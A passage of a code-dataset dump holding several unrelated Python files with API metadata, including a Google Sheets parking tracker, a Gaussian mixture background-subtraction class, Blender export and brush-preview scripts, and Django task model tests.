"line_number": 451, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 480, "usage_type": "call"}, {"api_name": "os.path", "line_number": 480, "usage_type": "attribute"}]}
+{"seq_id": "471967973", "text": "import gspread\nimport time\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom datetime import *\n\nscope = []\ncreds = []\n\nsheet = None\nlogSheet = None\nclient = None\n\nDATE_FORMAT_STRING = \"%Y-%m-%d %H:%M:%S EST\"\n\n# Getters\n\ndef isThereParking():\n return (spacesAvailable() > 0)\n\ndef occupiedStatusList():\n # Returns a list of bools that signify which parking spots are occupied\n\n connectSheet() # Refresh the sheet values\n statusList = sheet.col_values(2)[1:] # Get all booleans concerning occupation status\n\n for status in statusList: # Cast all values to boolean for sanity checking\n status = bool(status)\n\n return statusList\n\ndef spacesAvailable():\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n\n parkingSpaceCount = 0\n\n for i in range(0, len(occupiedStatuses)):\n if isOccupied(i):\n parkingSpaceCount = parkingSpaceCount + 1\n\n return parkingSpaceCount\n\ndef isOccupied(zeroIndexedSpaceNumber):\n occupiedStatuses = occupiedStatusList() # Get CSV from Google Sheets to parse\n return occupiedStatuses[zeroIndexedSpaceNumber].lower() == \"true\" # Get from list, cast to bool\n\ndef getParkingSpaceCount():\n occupiedStatuses = occupiedStatusList() # get list of booleans from Google Sheets spreadsheet\n return len(occupiedStatuses) # Return the number of booleans in the list.\n\n# Setters\n\ndef setOccupied(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if not isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n logOccupation()\n\n sheet.update_cell(index, 2, True); # Set the specified space to be occupied\n\ndef setVacant(zeroIndexedSpaceNumber):\n connectSheet() # Refresh state\n index = 2 + zeroIndexedSpaceNumber\n\n if isOccupied(zeroIndexedSpaceNumber): # If there is a state change, log it in the log sheet.\n logVacancy()\n\n sheet.update_cell(index, 2, False); # Set the specified space to be unoccupied\n\ndef setParkingSpaceCount(oneIndexedSpaceNumber):\n if (oneIndexedSpaceNumber < 1):\n return\n\n initialIndex = getParkingSpaceCount() # Get number of parking spaces in lot.\n\n # If the index is greater than the list length, then allocate more rows\n # to the table and ID accordingly.\n if oneIndexedSpaceNumber > initialIndex:\n for i in range( (initialIndex + 2),(oneIndexedSpaceNumber + 2) ):\n sheet.update_cell(i, 1, i-2)\n sheet.update_cell(i, 2, False)\n # Otherwise, if lesser, eliminate all items indexed at/after oneIndexedSpaceNumber.\n elif oneIndexedSpaceNumber < initialIndex:\n for i in range( (oneIndexedSpaceNumber + 2),(initialIndex + 2)):\n sheet.update_cell(i, 1, \"\")\n sheet.update_cell(i, 2, \"\")\n\n # If the length is the same as it already is, make no changes.\n\n\n\n#\n# All backend stuff to do with google sheets stuff\n#\n\ndef connectSheet():\n if isUninitialized():\n makeConnection()\n\ndef isUninitialized():\n return (sheet == None)\n\ndef makeConnection():\n # Make the connection to the Google Spreadsheet\n scope = ['https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n\n global client\n client = gspread.authorize(creds)\n global sheet\n global logSheet\n sheet = client.open('parking-status').get_worksheet(0)\n logSheet = client.open(\"parking-status\").get_worksheet(1)\n\n#\n# DateTime stuff\n#\n\ndef dateTimeFormat(dateTimeValue):\n return dateTimeValue.strftime(DATE_FORMAT_STRING)\n\ndef logVacancy(dateTimeValue = datetime.now()):\n timeListIndex = len(logSheet.col_values(1)) + 1 # Get row to insert time in\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Insert time into list.\n newLogValue = int(logSheet.cell(timeListIndex - 1, 2).value) - 1 # Get new count of people in lot\n logSheet.update_cell(timeListIndex, 2, newLogValue) # Set new count of people in lot to sheet\n\ndef logOccupation(dateTimeValue = datetime.now()):\n columnLength = len(logSheet.col_values(1)[1:]) # Read length of date column\n timeListIndex = columnLength + 2 # Get new index of insertion into log\n newOccupancyCount = 0\n\n if columnLength > 0: # If a previous value exists, our new occupancy is based on the previous value.\n newOccupancyCount = int(logSheet.cell(timeListIndex - 1, 2).value) + 1\n else: # Otherwise, our new occupancy is 1 because we assume that our initial occupancy is 0.\n newOccupancyCount = 1\n\n logSheet.update_cell(timeListIndex, 1, dateTimeFormat(dateTimeValue)) # Set new date in column 1\n logSheet.update_cell(timeListIndex, 2, newOccupancyCount) # Set new occupancy count in column 2\n\n\n# ALL CODE THAT IS RUN FOR CERTAIN IS RUN HERE\n", "sub_path": "util/sheets.py", "file_name": "sheets.py", "file_ext": "py", "file_size_in_byte": 4925, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 107, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 107, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.now", "line_number": 129, "usage_type": "call"}]}
+{"seq_id": "381163747", "text": "import numpy as np\nimport multiprocessing\nimport pickle\nimport pandas as pd\nfrom utils import load_pkl\nfrom cli import get_args\nfrom pathlib import Path\nimport os\nDATA_LEN = 46972\n\n\ndef get_inverted_data(model_dir):\n with open(model_dir / \"inverted-file\", \"r\") as f:\n unigram_idf = {}\n bigram_idf = {}\n doc_datas = [{'doc_len': 0, 'unigram': {}, 'bigram': {}} for _ in range(DATA_LEN)]\n while True:\n head_line = f.readline().strip()\n if head_line == \"\":\n break\n head_line = list(map(int, head_line.split()))\n head_idx = head_line[0]\n print(head_idx, end='\\r')\n if head_line[1] == -1:\n unigram_idf[str(head_idx)] = np.log(DATA_LEN / head_line[2])\n else:\n bigram_idf[str(head_idx) + \" \" + str(head_line[1])] = np.log(DATA_LEN / head_line[2])\n for _ in range(head_line[2]):\n line = f.readline()\n line = list(map(int, line.strip().split()))\n if head_line[1] == -1:\n doc_datas[line[0]]['doc_len'] += line[1]\n doc_datas[line[0]]['unigram'][str(head_idx)] = line[1]\n else:\n doc_datas[line[0]]['bigram'][str(head_line[0]) + \" \" + str(head_line[1])] = line[1]\n return unigram_idf, bigram_idf, doc_datas\n\n\nif __name__ == \"__main__\":\n args = get_args()\n if os.path.exists(\"unigram_idf.pkl\") and os.path.exists(\"bigram_idf.pkl\") and os.path.exists(\"doc_datas.pkl\"):\n pass\n else:\n unigram_idf, bigram_idf, doc_datas = get_inverted_data(args.model_dir)\n with open(\"unigram_idf.pkl\", \"wb\") as f:\n pickle.dump(unigram_idf, f)\n\n with open(\"bigram_idf.pkl\", \"wb\") as f:\n pickle.dump(bigram_idf, f)\n\n with open(\"doc_datas.pkl\", \"wb\") as f:\n pickle.dump(doc_datas, f)\n", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1909, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.log", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 27, "usage_type": "call"}, {"api_name": "cli.get_args", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "387631513", "text": "import bpy\nimport os\n\n\ncurrPath = os.path.splitext(bpy.data.filepath)[0]+ \".curves.js\"\nfile = open(currPath, \"w\") \n\nfile.write('var curves = {\\n')\nfor ob in bpy.data.objects.values() : \n if ob.type == 'CURVE' :\n file.write( '\"%s\":\\n' % ob.name)\n for spline in ob.data.splines :\n if len(spline.bezier_points) > 0 :\n file.write(\"[\")\n for bezier_point in spline.bezier_points.values() : \n handle_left = ob.matrix_world * bezier_point.handle_left\n co = ob.matrix_world * bezier_point.co\n handle_right = ob.matrix_world * bezier_point.handle_right\n\n file.write(\"[[%.3f, %.3f, %.3f], \" % (handle_left.x, handle_left.y, handle_left.z ))\n file.write(\"[%.3f, %.3f, %.3f], \" % (co.x, co.y, co.z ))\n file.write(\"[%.3f, %.3f, %.3f]],\\n \" % (handle_right.x, handle_right.y, handle_right.z ))\n\n file.write(\"],\\n\")\nfile.write(\"}\\n\")\nfile.close()", "sub_path": "tools/curve_exports.py", "file_name": "curve_exports.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.splitext", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.values", "line_number": 9, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 9, "usage_type": "attribute"}]}
+{"seq_id": "618195129", "text": "import numpy as np\nimport cv2 as cv2\nimport glob\nimport time\nimport os\nimport shutil\n\nglobal m_fit_num\n\nclass GMM():\n\n def __init__(self):\n self.GMM_MAX_COMPONT = 5 # 混合高斯数\n self.SIGMA = 30\n self.WEIGHT = 0.05\n self.T = 0.7 # 模型排序判读阀值\n self.alpha = 0.005 # 学习率\n self.eps = pow(10, -10)\n self.channel = 3 # RGB三个通道\n self.m_weight = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 权重\n self.m_mean = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 均值\n self.m_sigma = [[] for i in range(self.GMM_MAX_COMPONT * self.channel)] # 方差\n\n def init_model(self,img):\n row , col , channel = img.shape # 得到图片的长宽高 以及其中的通道数\n global m_fit_num\n for i in range(self.GMM_MAX_COMPONT * self.channel):\n self.m_weight[i] = np.zeros((row,col),dtype=\"float32\") # 每个点有5个高斯模型,总共三个通道\n self.m_mean[i] = np.zeros((row, col), dtype='float32')\n self.m_sigma[i] = np.ones((row, col), dtype='float32')\n self.m_sigma[i] *= self.SIGMA\n m_fit_num = np.zeros((row,col),dtype=\"int32\")\n\n def train_model(self,images):\n row, col, channel = images.shape # 得到图片的长宽高 以及其中的通道数\n B,R,G = cv2.split(images) # 利用cv2提取图像RGB三个通道的图形矩阵\n m_mask = np.zeros((row,col),dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row): # 遍历每一个像素点\n for j in range(col):\n cnt = 0\n for c,img in enumerate((B,G,R)):\n num_fit = 0\n for k in range(c * self.GMM_MAX_COMPONT,c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[k][i][j] != 0: # 权重不等于0\n delta = abs(img[i][j] - self.m_mean[k][i][j])\n if float(delta) < 2.5 * self.m_sigma[k][i][j]: # 在2.5个方差之内 平均数 方差 等参数\n self.m_weight[k][i][j] = (1 - self.alpha) * self.m_weight[k][i][j] + self.alpha * 1\n self.m_mean[k][i][j] = (1 - self.alpha) * self.m_mean[k][i][j] + self.alpha * img[i][j]\n self.m_sigma[k][i][j] = np.sqrt((1 - self.alpha) * self.m_sigma[k][i][j] * self.m_sigma[k][i][j] + self.alpha * (img[i][j] - self.m_mean[k][i][j]) * (img[i][j] - self.m_mean[k][i][j]))\n num_fit += 1\n else:\n self.m_weight[k][i][j] *= (1 - self.alpha)\n\n for p in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT): # 对权重进行降序 根据𝜔/𝜎降序排序 等会进行选择\n for q in range(p + 1, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (self.m_weight[p][i][j] / self.m_sigma[p][i][j]) <= (self.m_weight[q][i][j] / self.m_sigma[q][i][j]):\n self.m_sigma[p][i][j], self.m_sigma[q][i][j] = self.m_sigma[q][i][j], self.m_sigma[p][i][j]\n self.m_weight[p][i][j], self.m_weight[q][i][j] = self.m_weight[q][i][j], self.m_weight[p][i][j]\n self.m_mean[p][i][j], self.m_mean[q][i][j] = self.m_mean[q][i][j], self.m_mean[p][i][j]\n if num_fit == 0: # 没有匹配到任何一个高斯模型\n if self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT-1][i][j] ==0 :\n for kk in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if (0 == self.m_weight[kk][i][j]): # 重新初始化参数\n self.m_weight[kk][i][j] = self.WEIGHT\n self.m_mean[kk][i][j] = img[i][j]\n self.m_sigma[kk][i][j] = self.SIGMA\n break\n else:\n self.m_weight[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.WEIGHT\n self.m_mean[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = img[i][j]\n self.m_sigma[c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT - 1][i][j] = self.SIGMA\n\n weight_sum = 0 # 每个高斯模型的权重要进行归一化操作\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n else:\n break\n weight_scale = 1.0 / (weight_sum + self.eps)\n weight_sum = 0\n\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n self.m_weight[nn][i][j] *= weight_scale\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n # element = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3)) # 调用库函数开启形态学去噪\n # m_mask = cv2.morphologyEx(m_mask, cv2.MORPH_OPEN, element) # 开运算去噪\n return m_mask\n\n def judge_img(self,imgs):\n row, col, channel = imgs.shape\n B, G, R = cv2.split(imgs)\n m_mask = np.zeros((row, col), dtype=np.uint8)\n m_mask[:] = 255\n for i in range(row):\n for j in range(col):\n cnt = 0\n for c, img in enumerate((B, G, R)): # 一张图片的每个像素点进行判断 是否是作为前景还是背景\n weight_sum = 0\n for nn in range(c * self.GMM_MAX_COMPONT, c * self.GMM_MAX_COMPONT + self.GMM_MAX_COMPONT):\n if self.m_weight[nn][i][j] != 0:\n weight_sum += self.m_weight[nn][i][j]\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n if weight_sum > self.T:\n if abs(img[i][j] - self.m_mean[nn][i][j]) < 2 * self.m_sigma[nn][i][j]:\n cnt += 1\n break\n else:\n break\n\n if cnt == channel:\n m_mask[i][j] = 0\n\n m_mask = cv2.medianBlur(m_mask, 7)\n kernel_d = np.ones((5, 5), np.uint8)\n m_mask = cv2.dilate(m_mask, kernel_d)\n return m_mask\n\n\n\n\nif __name__ == '__main__':\n file_list = glob.glob('WavingTrees/b*.bmp') # 读入测试文件得列表\n GMM_Model = GMM()\n GMM_Model.__init__() # 初始化模型\n path = \"GMM_OUTPUT_Primordial\"\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n else:\n os.mkdir(path)\n i = -1\n for file in file_list:\n i += 1\n img = cv2.imread(file)\n if i == 0:\n GMM_Model.init_model(img) # 第一张图片\n if i <= 200: # 前面的200张用于训练模型\n t1 = time.time()\n print(\"第{}次训练\".format(i))\n m_mask = GMM_Model.train_model(img)\n t2 = time.time()\n print(\"花费时间:\",t2 - t1)\n if i == 286: # 训练完毕 开始识别\n print(\"开始背景检测\")\n t1 = time.time()\n j = 0\n for temp_file in file_list:\n temp_img = cv2.imread(temp_file)\n m_mask = GMM_Model.judge_img(temp_img)\n cv2.imwrite(\"GMM_OUTPUT_Primordial/{}.jpg\".format(str(j).zfill(3)), m_mask)\n j += 1\n t2 = time.time()\n print(\"检测花费时间:\",t2 - t1)\n\n\n\n\n\n\n\n", "sub_path": "GMM_Backgroundsubtraction.py", "file_name": "GMM_Backgroundsubtraction.py", "file_ext": "py", "file_size_in_byte": 8867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 135, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 147, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 148, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 154, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "time.time", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 168, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 170, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "289382679", "text": "__all__ = ['Job']\n\nfrom collections import namedtuple\n\n# Namedtuple which encapsulates a KQ job.\nJob = namedtuple(\n typename='Job',\n field_names=(\n 'id', # Job ID (str)\n 'timestamp', # Unix timestamp indicating when job was enqueued (int)\n 'topic', # Name of the Kafka topic (str)\n 'func', # Function to execute (callable)\n 'args', # Positional arguments (list)\n 'kwargs', # Keyword arguments (dict)\n 'timeout', # Job timeout threshold in seconds (int | float)\n 'key', # Kafka message key if any (str | None)\n 'partition' # Kafka topic partition if any (str | None)\n )\n)\n\n# noinspection PyUnresolvedReferences,PyProtectedMember\nJob.__new__.__defaults__ = (None,) * len(Job._fields)\n", "sub_path": "kq/job.py", "file_name": "job.py", "file_ext": "py", "file_size_in_byte": 796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "collections.namedtuple", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "532628809", "text": "from flaskblog import app, bcrypt, db\nimport json\n\nwith open('./posts.json') as f:\n data = json.load(f)\nprint(type(data))\n\nfor item in data:\n print(item)\n print(type(item))\n# print(data)\n\n# snipp for adding posts\nfor js in data:\n post = Post(title=js['title'], content=js['content'], user_id=js['user_id'])\n db.session.add(post)\n\ndb.session.commit()\n\nimport os\nclear = lambda: os.system('cls')\nclear()\n\n", "sub_path": "db_upload.py", "file_name": "db_upload.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "flaskblog.db.session.add", "line_number": 16, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 16, "usage_type": "name"}, {"api_name": "flaskblog.db.session.commit", "line_number": 18, "usage_type": "call"}, {"api_name": "flaskblog.db.session", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flaskblog.db", "line_number": 18, "usage_type": "name"}, {"api_name": "os.system", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "308417780", "text": "import xlwt\nimport time\n\ndef timeCove(a):\n timeArray = time.strptime(a, \"%Y%m%d\")\n otherStyleTime = time.strftime(\"%Y-%m-%d\",timeArray)\n return otherStyleTime\ndef set_style(name, height, bold=False):\n\n style = xlwt.XFStyle() # 初始化样式\n\n font = xlwt.Font() # 为样式创建字体\n font.name = name # 'Times New Roman'\n font.bold = bold\n font.color_index = 4\n font.height = height\n\n # borders= xlwt.Borders()\n # borders.left= 6\n # borders.right= 6\n # borders.top= 6\n # borders.bottom= 6\n\n style.font = font\n # style.borders = borders\n\n return style\n\n\n# 写excel\ndef write_excel(db,filename):\n f = xlwt.Workbook() # 创建工作簿\n '''\n 创建第一个sheet:\n sheet1\n '''\n sheet1 = f.add_sheet(u'sheet1', cell_overwrite_ok=True) # 创建sheet\n row0 = [u'收费员工号', u'日志日期', u'收入(元)']\n for i in range(0, len(row0)):\n sheet1.write(0, i, row0[i], set_style('Times New Roman', 220, True))\n\n for (i,j) in db.items():\n sheet1.write(i+1, 0, int('017'+str(j[2])), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 1, timeCove(j[0][0:8]), set_style('Times New Roman', 220, True))\n sheet1.write(i+1, 2, int(j[1])/100, set_style('Times New Roman', 220, True))\n f.save(filename[0:-4] + '.xlsx') # 保存文件\n\n\n", "sub_path": "123/creatXls.py", "file_name": "creatXls.py", "file_ext": "py", "file_size_in_byte": 1355, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.strptime", "line_number": 5, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 6, "usage_type": "call"}, {"api_name": "xlwt.XFStyle", "line_number": 10, "usage_type": "call"}, {"api_name": "xlwt.Font", "line_number": 12, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "198939661", "text": "from datetime import timedelta\nfrom unittest import TestCase\nfrom tasks.models import Task\nfrom django.utils import timezone\n\n\nclass TaskModelTestCase(TestCase):\n\n def test_complete_model_is_complete(self):\n target = Task()\n target.complete_time = timezone.now() - timezone.timedelta(days = 1 )\n\n \n self.assertTrue(target.is_complete)\n\n def test_incomplete_model_is_incomplete(self):\n target = Task()\n target.complete_time = None\n\n self.assertFalse(target.is_complete)\n\n def test_future_complete_model_is_incomplete(self):\n target = Task()\n target.complete_time = timezone.now() + timezone.timedelta(days = 1)\n\n self.assertFalse(target.is_complete)\n\n def test_due_soon_model_is_due_soon(self):\n target = Task() \n target.due_date = timezone.now() + timezone + timedelta(days = 1)\n\n self.assertTrue(target.due_soon)\n\n def test_mot_due_soon_model_is_not_due_soon(self):\n target = Task()\n target.due_date = timezone.now() + timezone.timedelta(days = 3)\n\n self.assertFalse(target.due_soon)\n\n def test_no_due_date_model_is_not_due_soon(self):\n target = Task()\n target.due_date = None\n\n self.assertFalse(target.due_soon)\n\n def test_mark_complete_marks_complete(self):\n target = Task()\n target.complete_time = None\n self.assertFalse(target.is_complete)\n\n target.mark_complete()\n\n self.assertTrue(target.is_complete)\n\n def test_mark_incomplete_marks_incomplete(self):\n target = Task()\n\n target.complete_time = timezone.now()\n self.assertTrue(target)\n\n target.mark_incomplete()\n\n self.assertTrue(target.is_complete)\n\n \n\n\n\n\n\n\n\n\n\n\n", "sub_path": "02/demos/todo/tasks/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "name"}, {"api_name": "tasks.models.Task", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 11, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 17, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 24, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 24, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 29, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 30, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 30, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 35, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 36, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 36, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 41, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 47, "usage_type": "call"}, {"api_name": "tasks.models.Task", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 58, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "37725209", "text": "import bpy\r\nfrom bpy.app.handlers import persistent\r\nfrom bpy.props import EnumProperty\r\n\r\npreview_collection = None\r\n\r\n\r\n@persistent\r\ndef brush_load_handler(none):\r\n global preview_collection\r\n\r\n unregister_and_unload_brushes()\r\n register_and_load_brushes()\r\n\r\n\r\n@persistent\r\ndef brush_update_handler(scene):\r\n global preview_collection\r\n\r\n try:\r\n if bpy.context.window_manager.brush_previews != bpy.context.tool_settings.sculpt.brush.name:\r\n bpy.context.window_manager.brush_previews = bpy.context.tool_settings.sculpt.brush.name\r\n except:\r\n pass\r\n\r\n if preview_collection:\r\n if not (set(brush.name for brush in bpy.data.brushes if brush.use_paint_sculpt) <= set(item[0] for item in preview_collection.items())):\r\n bpy.utils.previews.remove(preview_collection)\r\n add_brushes()\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef add_brushes():\r\n global preview_collection\r\n\r\n preview_collection = bpy.utils.previews.new()\r\n brushes = [brush for brush in bpy.data.brushes if brush.use_paint_sculpt]\r\n\r\n for brush in brushes:\r\n preview_collection.new(brush.name)\r\n\r\n\r\ndef brush_enum_items():\r\n global preview_collection\r\n\r\n enum_items = []\r\n\r\n for name, preview in preview_collection.items():\r\n enum_items.append((name, name, name, \"BRUSH_{}\".format(bpy.data.brushes[name].sculpt_tool if bpy.data.brushes[name].sculpt_tool != \"DRAW\" else \"SCULPT_DRAW\"), preview.icon_id))\r\n\r\n return enum_items\r\n\r\n\r\ndef brush_changed(self, context):\r\n wm = context.window_manager\r\n context.tool_settings.sculpt.brush = bpy.data.brushes[wm.brush_previews]\r\n\r\n\r\ndef register_and_load_brushes():\r\n global preview_collection\r\n\r\n add_brushes()\r\n\r\n bpy.types.WindowManager.brush_previews = EnumProperty(items=brush_enum_items(), update=brush_changed)\r\n\r\n\r\ndef unregister_and_unload_brushes():\r\n global preview_collection\r\n\r\n if preview_collection:\r\n bpy.utils.previews.remove(preview_collection)\r\n preview_collection = None\r\n", "sub_path": "All_In_One/addons/HOps/brush_previews.py", "file_name": "brush_previews.py", "file_ext": "py", "file_size_in_byte": 2122, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "bpy.app.handlers.persistent", "line_number": 8, "usage_type": "name"}, {"api_name": "bpy.context", "line_number": 21, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 27, "usage_type": "attribute"}, {"api_name": "bpy.utils.previews.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.utils", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 30, "usage_type": "attribute"}, {"api_name": "bpy.props.EnumProperty", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.app.handlers.persistent", "line_number": 16, "usage_type": "name"}, {"api_name": "bpy.utils.previews.new", "line_number": 36, "usage_type": "call"}, 